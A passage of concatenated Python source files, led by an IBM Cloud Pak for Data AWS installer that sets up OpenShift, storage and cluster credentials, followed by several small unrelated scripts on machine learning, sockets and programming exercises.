TR.info(methodName,"Run px-spec command %s"%px_spec_cmd)
try:
retcode = check_output(['bash','-c', px_spec_cmd])
TR.info(methodName,"Completed %s command with return value %s" %(px_spec_cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
time.sleep(300)
create_px_sc = "sudo sh /ibm/templates/px/px-storageclasses.sh"
TR.info(methodName,"Run px sc command %s"%create_px_sc)
try:
retcode = check_output(['bash','-c', create_px_sc])
TR.info(methodName,"Completed %s command with return value %s" %(create_px_sc,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.setpxVolumePermission(icpdInstallLogFile)
TR.info(methodName,"Configuration of Portworx for CPD completed")
#endDef
def installOCP(self, icpdInstallLogFile):
methodName = "installOCP"
TR.info(methodName," Start installation of Openshift Container Platform")
installConfigFile = "/ibm/installDir/install-config.yaml"
autoScalerFile = "/ibm/templates/cpd/machine-autoscaler.yaml"
healthcheckFile = "/ibm/templates/cpd/health-check.yaml"
icf_1az = "/ibm/installDir/install-config-1AZ.yaml"
icf_3az = "/ibm/installDir/install-config-3AZ.yaml"
asf_1az = "/ibm/templates/cpd/machine-autoscaler-1AZ.yaml"
asf_3az = "/ibm/templates/cpd/machine-autoscaler-3AZ.yaml"
hc_1az = "/ibm/templates/cpd/health-check-1AZ.yaml"
hc_3az = "/ibm/templates/cpd/health-check-3AZ.yaml"
if(len(self.zones)==1):
shutil.copyfile(icf_1az,installConfigFile)
shutil.copyfile(asf_1az,autoScalerFile)
shutil.copyfile(hc_1az, healthcheckFile)
else:
shutil.copyfile(icf_3az,installConfigFile)
shutil.copyfile(asf_3az,autoScalerFile)
shutil.copyfile(hc_3az, healthcheckFile)
self.updateTemplateFile(installConfigFile,'${az1}',self.zones[0])
self.updateTemplateFile(installConfigFile,'${baseDomain}',self.DomainName)
self.updateTemplateFile(installConfigFile,'${master-instance-type}',self.MasterInstanceType)
self.updateTemplateFile(installConfigFile,'${worker-instance-type}',self.ComputeInstanceType)
self.updateTemplateFile(installConfigFile,'${worker-instance-count}',self.NumberOfCompute)
self.updateTemplateFile(installConfigFile,'${master-instance-count}',self.NumberOfMaster)
self.updateTemplateFile(installConfigFile,'${region}',self.region)
self.updateTemplateFile(installConfigFile,'${subnet-1}',self.PrivateSubnet1ID)
self.updateTemplateFile(installConfigFile,'${subnet-2}',self.PublicSubnet1ID)
self.updateTemplateFile(installConfigFile,'${pullSecret}',self.readFileContent(self.pullSecret))
self.updateTemplateFile(installConfigFile,'${sshKey}',self.readFileContent("/root/.ssh/id_rsa.pub"))
self.updateTemplateFile(installConfigFile,'${clustername}',self.ClusterName)
self.updateTemplateFile(installConfigFile, '${FIPS}',self.EnableFips)
self.updateTemplateFile(installConfigFile, '${PrivateCluster}',self.PrivateCluster)
self.updateTemplateFile(installConfigFile, '${cluster-cidr}',self.ClusterNetworkCIDR)
self.updateTemplateFile(installConfigFile, '${machine-cidr}', self.VPCCIDR)
self.updateTemplateFile(autoScalerFile, '${az1}', self.zones[0])
self.updateTemplateFile(healthcheckFile, '${az1}', self.zones[0])
if(len(self.zones)>1):
self.updateTemplateFile(installConfigFile,'${az2}',self.zones[1])
self.updateTemplateFile(installConfigFile,'${az3}',self.zones[2])
self.updateTemplateFile(installConfigFile,'${subnet-3}',self.PrivateSubnet2ID)
self.updateTemplateFile(installConfigFile,'${subnet-4}',self.PrivateSubnet3ID)
self.updateTemplateFile(installConfigFile,'${subnet-5}',self.PublicSubnet2ID)
self.updateTemplateFile(installConfigFile,'${subnet-6}',self.PublicSubnet3ID)
self.updateTemplateFile(autoScalerFile, '${az2}', self.zones[1])
self.updateTemplateFile(autoScalerFile, '${az3}', self.zones[2])
self.updateTemplateFile(healthcheckFile, '${az2}', self.zones[1])
self.updateTemplateFile(healthcheckFile, '${az3}', self.zones[2])
TR.info(methodName,"Download Openshift Container Platform")
self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/openshift-install", destPath="/ibm/openshift-install")
self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/oc", destPath="/usr/bin/oc")
self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/kubectl", destPath="/usr/bin/kubectl")
os.chmod("/usr/bin/oc", stat.S_IEXEC)
os.chmod("/usr/bin/kubectl", stat.S_IEXEC)
TR.info(methodName,"Initiating installation of Openshift Container Platform")
os.chmod("/ibm/openshift-install", stat.S_IEXEC)
install_ocp = "sudo ./openshift-install create cluster --dir=/ibm/installDir --log-level=debug"
TR.info(methodName,"Output File name: %s"%icpdInstallLogFile)
try:
process = Popen(install_ocp,shell=True,stdout=icpdInstallLogFile,stderr=icpdInstallLogFile,close_fds=True)
stdoutdata,stderrdata=process.communicate()
except CalledProcessError as e:
TR.error(methodName, "ERROR return code: %s, Exception: %s" % (e.returncode, e), e)
raise e
TR.info(methodName,"Installation of Openshift Container Platform %s %s" %(stdoutdata,stderrdata))
time.sleep(30)
destDir = "/root/.kube"
if (not os.path.exists(destDir)):
os.makedirs(destDir)
shutil.copyfile("/ibm/installDir/auth/kubeconfig","/root/.kube/config")
self.ocpassword = self.readFileContent("/ibm/installDir/auth/kubeadmin-password").rstrip("\n\r")
self.logincmd = "oc login -u kubeadmin -p "+self.ocpassword
try:
call(self.logincmd, shell=True,stdout=icpdInstallLogFile)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
get_clusterId = r"oc get machineset -n openshift-machine-api -o jsonpath='{.items[0].metadata.labels.machine\.openshift\.io/cluster-api-cluster}'"
TR.info(methodName,"get_clusterId %s"%get_clusterId)
try:
self.clusterID = check_output(['bash','-c',get_clusterId])
TR.info(methodName,"self.clusterID %s"%self.clusterID)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.updateTemplateFile(autoScalerFile, 'CLUSTERID', self.clusterID)
create_machine_as_cmd = "oc create -f "+autoScalerFile
TR.info(methodName,"Create of Machine auto scaler")
try:
retcode = check_output(['bash','-c', create_machine_as_cmd])
TR.info(methodName,"Created Machine auto scaler %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.updateTemplateFile(healthcheckFile, 'CLUSTERID', self.clusterID)
create_healthcheck_cmd = "oc create -f "+healthcheckFile
TR.info(methodName,"Create of Health check")
try:
retcode = check_output(['bash','-c', create_healthcheck_cmd])
TR.info(methodName,"Created Health check %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName,"Create OCP registry")
registry_mc = "/ibm/templates/cpd/insecure-registry.yaml"
registries = "/ibm/templates/cpd/registries.conf"
crio_conf = "/ibm/templates/cpd/crio.conf"
crio_mc = "/ibm/templates/cpd/crio-mc.yaml"
route = "default-route-openshift-image-registry.apps."+self.ClusterName+"."+self.DomainName
self.updateTemplateFile(registries, '${registry-route}', route)
config_data = base64.b64encode(self.readFileContent(registries))
self.updateTemplateFile(registry_mc, '${config-data}', config_data)
crio_config_data = base64.b64encode(self.readFileContent(crio_conf))
self.updateTemplateFile(crio_mc, '${crio-config-data}', crio_config_data)
route_cmd = "oc patch configs.imageregistry.operator.openshift.io/cluster --type merge -p '{\"spec\":{\"defaultRoute\":true,\"replicas\":"+self.NumberOfAZs+"}}'"
TR.info(methodName,"Creating route with command %s"%route_cmd)
annotate_cmd = "oc annotate route default-route haproxy.router.openshift.io/timeout=600s -n openshift-image-registry"
sessionAffinity_cmd = "oc patch svc/image-registry -p '{\"spec\":{\"sessionAffinity\": \"ClientIP\"}}' -n openshift-image-registry"
update_mgmt_state_cmd = "oc patch configs.imageregistry.operator.openshift.io/cluster --type merge -p '{\"spec\":{\"managementState\":\"Unmanaged\"}}'"
set_s3_storage_limit = "oc set env deployment/image-registry -n openshift-image-registry REGISTRY_STORAGE_S3_CHUNKSIZE=104857600"
try:
retcode = check_output(['bash','-c', route_cmd])
TR.info(methodName,"Created route with command %s returned %s"%(route_cmd,retcode))
time.sleep(30)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
try:
retcode = call(annotate_cmd,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"annotate_cmd %s retcode=%s" %(annotate_cmd,retcode))
time.sleep(30)
retcode = call(sessionAffinity_cmd,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"sessionAffinity_cmd %s retcode=%s" %(sessionAffinity_cmd,retcode))
time.sleep(30)
retcode = call(update_mgmt_state_cmd,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"update_mgmt_state_cmd %s retcode=%s" %(update_mgmt_state_cmd,retcode))
time.sleep(30)
retcode = call(set_s3_storage_limit,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"set_s3_storage_limit %s retcode=%s" %(set_s3_storage_limit,retcode))
time.sleep(30)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
destDir = "/etc/containers/"
if (not os.path.exists(destDir)):
os.makedirs(destDir)
shutil.copyfile(registries,"/etc/containers/registries.conf")
create_registry = "oc create -f "+registry_mc
create_crio_mc = "oc create -f "+crio_mc
"""
Addd logic to create openshift httpdpasswd and use it instead of default kubeadmin credentials
"""
TR.info(methodName,"Creating htpasswd for openshift")
htpasswd_cmd = "htpasswd -c -B -b /tmp/.htpasswd admin "+self.password
htpass_secret_cmd = "oc create secret generic htpass-secret --from-file=htpasswd=/tmp/.htpasswd -n openshift-config"
create_OAuth_cmd = "oc apply -f /ibm/installDir/auth-htpasswd.yaml"
create_oc_policy_cmd = "oc adm policy add-cluster-role-to-user cluster-admin admin"
TR.info(methodName,"Creating htpasswd for openshift with command")
try:
time.sleep(30)
htpasswd_retcode = check_output(['bash','-c', htpasswd_cmd])
TR.info(methodName,"Creating OC secret generic with command %s"%htpass_secret_cmd)
time.sleep(30)
secret_retcode = check_output(['bash','-c', htpass_secret_cmd])
TR.info(methodName,"Creating OAuth with command %s"%create_OAuth_cmd)
oauth_retcode = check_output(['bash','-c', create_OAuth_cmd])
TR.info(methodName,"Creating OC Adm policy add cluster role to user with command %s"%create_oc_policy_cmd)
oc_policy_retcode = check_output(['bash','-c', create_oc_policy_cmd])
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName,"Created htpasswd returned %s"%(htpasswd_retcode))
TR.info(methodName,"Created OC secret with command %s returned %s"%(htpass_secret_cmd,secret_retcode))
TR.info(methodName,"Created OAuth with command %s returned %s"%(create_OAuth_cmd,oauth_retcode))
TR.info(methodName,"Created Cluster role to user with command %s returned %s"%(create_oc_policy_cmd,oc_policy_retcode))
TR.info(methodName,"Created htpasswd for openshift")
TR.info(methodName,"Creating registry mc with command %s"%create_registry)
try:
reg_retcode = check_output(['bash','-c', create_registry])
TR.info(methodName,"Creating crio mc with command %s"%create_crio_mc)
crio_retcode = check_output(['bash','-c', create_crio_mc])
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName,"Created regsitry with command %s returned %s"%(create_registry,reg_retcode))
TR.info(methodName,"Created Crio mc with command %s returned %s"%(create_crio_mc,crio_retcode))
create_cluster_as_cmd = "oc create -f /ibm/templates/cpd/cluster-autoscaler.yaml"
TR.info(methodName,"Create of Cluster auto scaler")
try:
retcode = check_output(['bash','-c', create_cluster_as_cmd])
TR.info(methodName,"Created Cluster auto scaler %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
"""
"oc create -f ${local.ocptemplates}/wkc-sysctl-mc.yaml",
"oc create -f ${local.ocptemplates}/security-limits-mc.yaml",
"""
sysctl_cmd = "oc create -f /ibm/templates/cpd/wkc-sysctl-mc.yaml"
TR.info(methodName,"Create SystemCtl Machine config")
try:
retcode = check_output(['bash','-c', sysctl_cmd])
TR.info(methodName,"Created SystemCtl Machine config %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
secLimits_cmd = "oc create -f /ibm/templates/cpd/security-limits-mc.yaml"
TR.info(methodName,"Create Security Limits Machine config")
try:
retcode = check_output(['bash','-c', secLimits_cmd])
TR.info(methodName,"Created Security Limits Machine config %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
time.sleep(600)
oc_route_cmd = "oc get route console -n openshift-console | grep 'console' | awk '{print $2}'"
TR.info(methodName, "Get OC URL")
try:
self.openshiftURL = check_output(['bash','-c', oc_route_cmd])
TR.info(methodName, "OC URL retrieved %s"%self.openshiftURL)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName," Completed installation of Openshift Container Platform")
#endDef
def __init(self, stackId, stackName, icpdInstallLogFile):
methodName = "_init"
global StackParameters, StackParameterNames
boto3.setup_default_session(region_name=self.region)
self.cfnResource = boto3.resource('cloudformation', region_name=self.region)
self.cf = boto3.client('cloudformation', region_name=self.region)
self.ec2 = boto3.client('ec2', region_name=self.region)
self.s3 = boto3.client('s3', region_name=self.region)
self.iam = boto3.client('iam',region_name=self.region)
self.secretsmanager = boto3.client('secretsmanager', region_name=self.region)
self.ssm = boto3.client('ssm', region_name=self.region)
StackParameters = self.getStackParameters(stackId)
StackParameterNames = StackParameters.keys()
TR.info(methodName,"self.stackParameters %s" % StackParameters)
TR.info(methodName,"self.stackParameterNames %s" % StackParameterNames)
self.logExporter = LogExporter(region=self.region,
bucket=self.ICPDDeploymentLogsBucketName,
keyPrefix=stackName,
fqdn=socket.getfqdn()
)
TR.info(methodName,"Create ssh keys")
command = "ssh-keygen -P {} -f /root/.ssh/id_rsa".format("''")
try:
call(command,shell=True,stdout=icpdInstallLogFile)
TR.info(methodName,"Created ssh keys")
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
def getSecret(self, icpdInstallLogFile):
methodName = "getSecret"
TR.info(methodName,"Start Get secrets %s"%self.cpdSecret)
get_secret_value_response = self.secretsmanager.get_secret_value(SecretId=self.cpdSecret)
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
secretDict = json.loads(secret)
#TR.info(methodName,"Secret %s"%secret)
self.password = secretDict['adminPassword']
#TR.info(methodName,"password %s"%self.password)
self.apiKey = secretDict['apikey']
#TR.info(methodName,"apiKey %s"%self.apiKey)
TR.info(methodName,"End Get secrets")
#endDef
def updateSecret(self, icpdInstallLogFile):
methodName = "updateSecret"
TR.info(methodName,"Start updateSecret %s"%self.ocpSecret)
secret_update = '{"ocpPassword":'+self.ocpassword+'}'
response = self.secretsmanager.update_secret(SecretId=self.ocpSecret,SecretString=secret_update)
TR.info(methodName,"Updated secret for %s with response %s"%(self.ocpSecret, response))
TR.info(methodName,"End updateSecret")
#endDef
#
def exportResults(self, name, parameterValue ,icpdInstallLogFile):
methodName = "exportResults"
TR.info(methodName,"Start export results")
self.ssm.put_parameter(Name=name,
Value=parameterValue,
Type='String',
Overwrite=True)
TR.info(methodName,"Value: %s put to: %s." % (parameterValue,name))
#endDef
def main(self,argv):
methodName = "main"
self.rc = 0
try:
beginTime = Utilities.currentTimeMillis()
cmdLineArgs = Utilities.getInputArgs(self.ArgsSignature,argv[1:])
trace, logFile = self._configureTraceAndLogging(cmdLineArgs)
self.region = cmdLineArgs.get('region')
if (logFile):
TR.appendTraceLog(logFile)
if (trace):
TR.info(methodName,"Tracing with specification: '%s' to log file: '%s'" % (trace,logFile))
logFilePath = os.path.join(self.logsHome,"icpd_install.log")
with open(logFilePath,"a+") as icpdInstallLogFile:
self.stackId = cmdLineArgs.get('stackid')
self.stackName = cmdLineArgs.get('stack-name')
self.amiID = environ.get('AMI_ID')
self.cpdSecret = environ.get('CPD_SECRET')
self.ocpSecret = environ.get('OCP_SECRET')
self.cpdbucketName = environ.get('ICPDArchiveBucket')
self.ICPDInstallationCompletedURL = environ.get('ICPDInstallationCompletedURL')
TR.info(methodName, "amiID %s "% self.amiID)
TR.info(methodName, "cpdbucketName %s "% self.cpdbucketName)
TR.info(methodName, "ICPDInstallationCompletedURL %s "% self.ICPDInstallationCompletedURL)
TR.info(methodName, "cpdSecret %s "% self.cpdSecret)
TR.info(methodName, "ocpSecret %s "% self.ocpSecret)
self.__init(self.stackId,self.stackName, icpdInstallLogFile)
self.zones = Utilities.splitString(self.AvailabilityZones)
TR.info(methodName," AZ values %s" % self.zones)
TR.info(methodName,"RedhatPullSecret %s" %self.RedhatPullSecret)
secret = self.RedhatPullSecret.split('/',1)
TR.info(methodName,"Pull secret %s" %secret)
self.pullSecret = "/ibm/pull-secret"
s3_cp_cmd = "aws s3 cp "+self.RedhatPullSecret+" "+self.pullSecret
TR.info(methodName,"s3 cp cmd %s"%s3_cp_cmd)
call(s3_cp_cmd, shell=True,stdout=icpdInstallLogFile)
self.getSecret(icpdInstallLogFile)
ocpstart = Utilities.currentTimeMillis()
self.installOCP(icpdInstallLogFile)
ocpend = Utilities.currentTimeMillis()
self.printTime(ocpstart, ocpend, "Installing OCP")
self.installWKC = Utilities.toBoolean(self.WKC)
self.installWSL = Utilities.toBoolean(self.WSL)
self.installDV = Utilities.toBoolean(self.DV)
self.installWML = Utilities.toBoolean(self.WML)
self.installOSWML = Utilities.toBoolean(self.OpenScale)
self.installCDE = Utilities.toBoolean(self.CDE)
self.installSpark= Utilities.toBoolean(self.Spark)
if(self.installOSWML):
self.installWML=True
storagestart = Utilities.currentTimeMillis()
if(self.StorageType=='OCS'):
self.configureOCS(icpdInstallLogFile)
elif(self.StorageType=='Portworx'):
TR.info(methodName,"PortworxSpec %s" %self.PortworxSpec)
spec = self.PortworxSpec.split('/',1)
TR.info(methodName,"spec %s" %spec)
self.spec = "/ibm/templates/px/px-spec.yaml"
s3_cp_cmd = "aws s3 cp "+self.PortworxSpec+" "+self.spec
TR.info(methodName,"s3 cp cmd %s"%s3_cp_cmd)
call(s3_cp_cmd, shell=True,stdout=icpdInstallLogFile)
self.configurePx(icpdInstallLogFile)
elif(self.StorageType=='EFS'):
self.EFSDNSName = environ.get('EFSDNSName')
self.EFSID = environ.get('EFSID')
self.configureEFS()
storageend = Utilities.currentTimeMillis()
self.printTime(storagestart, storageend, "Installing storage")
self.installCPD(icpdInstallLogFile)
self.updateSecret(icpdInstallLogFile)
self.exportResults(self.stackName+"-OpenshiftURL", "https://"+self.openshiftURL, icpdInstallLogFile)
self.exportResults(self.stackName+"-CPDURL", "https://"+self.cpdURL, icpdInstallLogFile)
#endWith
except Exception as e:
TR.error(methodName,"Exception with message %s" %e)
self.rc = 1
finally:
try:
# Copy icpHome/logs to the S3 bucket for logs.
self.logExporter.exportLogs("/var/log/")
self.logExporter.exportLogs("/ibm/cpd-cli-workspace/Logs")
self.logExporter.exportLogs("%s" % self.logsHome)
except Exception as e:
TR.error(methodName,"ERROR: %s" % e, e)
self.rc = 1
#endTry
endTime = Utilities.currentTimeMillis()
elapsedTime = (endTime - beginTime)/1000
etm, ets = divmod(elapsedTime,60)
eth, etm = divmod(etm,60)
if (self.rc == 0):
success = 'true'
status = 'SUCCESS'
TR.info(methodName,"SUCCESS END CPD Install AWS ICPD Quickstart. Elapsed time (hh:mm:ss): %d:%02d:%02d" % (eth,etm,ets))
self.updateStatus(status)
else:
success = 'false'
status = 'FAILURE: Check logs in S3 log bucket or on the Boot node EC2 instance in /ibm/logs/icpd_install.log and /ibm/logs/post_install.log'
TR.info(methodName,"FAILED END CPD Install AWS ICPD Quickstart. Elapsed time (hh:mm:ss): %d:%02d:%02d" % (eth,etm,ets))
self.updateStatus(status)
#endIf
try:
data = "%s: IBM Cloud Pak installation elapsed time: %d:%02d:%02d" % (status,eth,etm,ets)
check_call(['cfn-signal',
'--success', success,
'--id', self.stackId,
'--reason', status,
'--data', data,
self.ICPDInstallationCompletedURL
])
except CalledProcessError as e:
TR.error(methodName, "ERROR return code: %s, Exception: %s" % (e.returncode, e), e)
raise e
#end Def
#endClass
if __name__ == '__main__':
mainInstance = CPDInstall()
mainInstance.main(sys.argv)
#endIf |
class MyClass:
def __init__(self, n):
self.n = n
print("__init__(%d) called" % self.n)
def __del__(self):
print("__del__(%d) called" % self.n)
a1 = MyClass(1)
a2 = MyClass(2)
a3 = MyClass(3)
# l = []
# for i in range(10,21):
# l.append(MyClass(i))
for i in range(10,21):
x = MyClass(i)
if (i == 15) or (i == 17):
del a1
del a3
a3 = MyClass(300+i)
a1 = MyClass(100+i)
|
#import sys
#input = sys.stdin.readline
def main():
N, K = map( int, input().split())
# if N%K == 0:
# print(0)
# return
print( min(N%K, K - N%K))
if __name__ == '__main__':
main()
|
import argparse
import joblib
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from typing import Text
import yaml
def train(config_path: Text) -> None:
"""Train model
Args:
config_path {Text}: path to config
"""
config = yaml.safe_load(open(config_path))
train_dataset_path = config['data_split']['train_path']
model_path = config['train']['model_path']
# Load train set
train_dataset = pd.read_csv(train_dataset_path)
# Get X and Y
y = train_dataset.loc[:, 'target'].values.astype('float32')
X = train_dataset.drop('target', axis=1).values
# Create an instance of classifier and fit the data.
# clf = LogisticRegression(C=0.001, solver='saga', multi_class='multinomial', max_iter=100)
clf= SVC(C= 0.01, kernel='linear', gamma= 'scale', degree= 5)
clf.fit(X, y)
joblib.dump(clf, model_path)
if __name__ == '__main__':
args_parser = argparse.ArgumentParser()
args_parser.add_argument('--config', dest='config', required=True)
args = args_parser.parse_args()
train(config_path=args.config) |
######################################################################################################################################################################
###### A list of functions useful to the tensorflow model. ##########################################################################################
######################################################################################################################################################################
import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
import collections
import random
from scipy import spatial
import io
import sys
from preprocess import load_glove, get_input_data, build_dictionaries, create_embeddings, get_input_labels, get_input_data_per_batch, get_input_labels_per_batch
# Transforms input_data, a list of articles tokenized by word, into a list of articles tokenized by wordID.
def get_input_data_as_ids(word2id, input_data):
input_data_as_ids = []
for article in input_data:
word_as_index_list = []
for word in article:
index = word2id[word]
word_as_index_list.append(index)
input_data_as_ids.append(word_as_index_list)
return np.array(input_data_as_ids)
#ADD COMMENT
def get_batch_from_folder(max_article_length, folder_name, batch_size, num_batches, wordToID):
for i in range(num_batches):
masks=[]
batch_input_data_as_ids = []
batch_input_scores = []
article_count = 0
batch_articles = get_input_data_per_batch(batch_size, i * batch_size, folder_name)
batch_articles_ids = get_input_data_as_ids(wordToID, batch_articles)
batch_input_scores = get_input_labels_per_batch(batch_size, i * batch_size, folder_name)
# Pads each article in the batch to max_article_length
padded_batch_articles_ids = []
for article_id_list in batch_articles_ids:
mask = [1.0] * len(article_id_list)
if len(article_id_list) > max_article_length:
article_id_list = article_id_list[:max_article_length]
while len(article_id_list) < max_article_length:
article_id_list.append(wordToID['<PAD>'])
mask.append(-100.0)
padded_batch_articles_ids.append(article_id_list)
masks.append(mask)
yield np.asarray(padded_batch_articles_ids), np.expand_dims(np.asarray(batch_input_scores), axis=1), np.asarray(masks)
#ADD COMMENT
def run_and_eval_dev(sess, max_article_length, folder_name, dev_batch_size, num_dev_batches, wordToID, embeddings, cost, predictions, inputs_placeholder, masks_placeholder, scores_placeholder, embedding_placeholder):
epoch_cost = 0.0
batches = get_batch_from_folder(max_article_length, folder_name, dev_batch_size, num_dev_batches, wordToID)
all_batch_predictions = np.zeros(shape=(dev_batch_size, num_dev_batches, 1), dtype=np.float32)
all_batch_labels = np.zeros(shape=(dev_batch_size, num_dev_batches, 1), dtype=np.float32)
for batch in range(num_dev_batches):
padded_batch_articles_ids, batch_labels, batch_masks = batches.next()
all_batch_labels[:, batch] = batch_labels
batch_cost, batch_predictions = sess.run([cost, predictions], feed_dict={inputs_placeholder: padded_batch_articles_ids, masks_placeholder: batch_masks, scores_placeholder: batch_labels, embedding_placeholder: embeddings})
all_batch_predictions[:, batch] = batch_predictions
epoch_cost += batch_cost / num_dev_batches
#Evaluate entire dev set
similarity_threshold = 0.1
correctly_scored_count = 0
score_differences = abs(all_batch_labels - all_batch_predictions)
correctly_scored_count = np.sum(score_differences < similarity_threshold)
performance = tf.divide(correctly_scored_count, num_dev_batches*dev_batch_size)
print "Test correctly scored count: " + str(correctly_scored_count)
sys.stdout.flush()
print "Test performance: " + str(performance)
sys.stdout.flush()
return epoch_cost
# Creates & Returns the tensorflow graph's placeholders
def create_placeholders(max_article_length, batch_size, vocab_size, embedding_dim):
inputs_placeholder = tf.placeholder(tf.int32, shape=[batch_size, max_article_length], name= "inputs_placeholder") #must edit this!!!
masks_placeholder = tf.placeholder(tf.float32, shape=[batch_size, max_article_length], name= "masks_placeholder") #need this to match!
scores_placeholder = tf.placeholder(tf.float32, shape=[None, 1], name= "scores_placeholder")
embedding_placeholder = tf.placeholder(tf.float32, shape=[vocab_size, embedding_dim], name= "embedding_placeholder")
return inputs_placeholder, masks_placeholder, scores_placeholder, embedding_placeholder
# Returns the mean squared error cost
def get_cost(predictions, true_labels):
temp = tf.square(tf.subtract(predictions, true_labels))
return tf.reduce_mean(temp)
|
'''Question 9
Level 2
Question£º
Write a program that accepts sequence of lines as input and prints the lines after making all characters in the sentence capitalized.
Suppose the following input is supplied to the program:
Hello world
Practice makes perfect
Then, the output should be:
HELLO WORLD
PRACTICE MAKES PERFECT
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.'''
lines = []
i = 0
while i <1:
sentence = input("Please enter sentence here: ")
if sentence == '':
i = 1
else:
lines.append(sentence.upper())
for line in lines:
print(line)
|
from .abstractmodel import AbstractClassificationModel
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# Abstract focal model
class AbstractFocalModel(AbstractClassificationModel):
# compile model
def compile_model(self, net):
print("Learning rate is set to ", self.learning_rate)
optimizer = optim.SGD(net.parameters(), lr=self.learning_rate, momentum=0.9, weight_decay=5e-4)
criterion = FocalLoss(self.focal_gamma).cuda(0)
return optimizer, criterion
class FocalLoss(nn.Module):
def __init__(self, focal_gamma_arg):
self.focal_gamma = focal_gamma_arg
super(FocalLoss, self).__init__()
def forward(self, y_pred, y):
alpha = 0.25
epsilon = 1e-7
y_pred = F.softmax(y_pred, dim=1)
y_pred = y_pred[range(y_pred.shape[0]), y] + epsilon
focal_loss = -alpha * torch.pow(1.0 - y_pred, self.focal_gamma) * torch.log(epsilon + y_pred)
#print("fl:", focal_loss)
return focal_loss.mean()
|
'''
Created on Dec 18, 2013
@author: anbangx
'''
if __name__ == '__main__':
def f(): return 0
def g(): return 1
f = g
print(f()) |
# Copyright 2016 Husky Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zmq
class OperationParam(object):
data_str = "data"
url_str = "url"
lambda_str = "lambda"
list_str = "list_name"
def __init__(self):
pass
class GlobalVar(object):
actiontype = "action"
transformationtype = "transformation"
loadtype = "load"
librarytype = "library"
data_chunk = dict()
name_to_func = dict()
name_to_type = dict()
name_to_prefunc = dict()
name_to_postfunc = dict()
def __init__(self):
pass
class GlobalSocket(object):
def __init__(self):
pass
# pipe_from_cpp
# pipe_to_cpp
@staticmethod
def init_socket(wid, pid, session_id):
ctx = zmq.Context()
GlobalSocket.pipe_from_cpp = zmq.Socket(ctx, zmq.PULL)
GlobalSocket.pipe_from_cpp.bind("ipc://pyhusky-session-"+session_id+"-proc-"+pid+"-"+wid)
GlobalSocket.pipe_to_cpp = zmq.Socket(ctx, zmq.PUSH)
GlobalSocket.pipe_to_cpp.connect("ipc://cpphusky-session-"+session_id+"-proc-"+pid+"-"+wid)
@staticmethod
def send(content):
GlobalSocket.pipe_to_cpp.send(content)
@staticmethod
def recv():
return GlobalSocket.pipe_from_cpp.recv()
class GlobalN2NSocket(object):
@staticmethod
def init_socket():
ctx = zmq.Context()
comm_port = int(GlobalSocket.recv()) + 1
GlobalN2NSocket.puller = ctx.socket(zmq.PULL)
GlobalN2NSocket.puller.bind("tcp://0.0.0.0:" + str(comm_port + GlobalVar.local_id))
GlobalN2NSocket.pushers = []
for _ in xrange(int(GlobalSocket.recv())):
host = "tcp://" + GlobalSocket.recv() + ":"
for j in xrange(int(GlobalSocket.recv())):
sock = ctx.socket(zmq.PUSH)
sock.connect(host + str(comm_port + j))
GlobalN2NSocket.pushers.append(sock)
@staticmethod
def send(dst, msg):
GlobalN2NSocket.pushers[dst].send(msg)
@staticmethod
def recv():
return GlobalN2NSocket.puller.recv()
|
#from models import User
from models import User
from fastapi import FastAPI
from starlette.routing import Host
import uvicorn
app = FastAPI()
@app.post('/users/', response_model=User)
def create_user(user:User):
return user
if __name__ == "__main__":
uvicorn.run(app, Host = "0.0.0.0", port = 8000) |
from assignmentelasticsearch.search import app
from assignmentelasticsearch.search.functions import find_most_expensive, find_greenest, find_allweeklong
@app.endpoint("most-expensive")
def mostexpensive():
return {"most expensive 10 product": find_most_expensive()}
@app.endpoint("greenest")
def greenest():
return {"greenest": find_greenest()}
@app.endpoint("all-week-long")
def allweeklong():
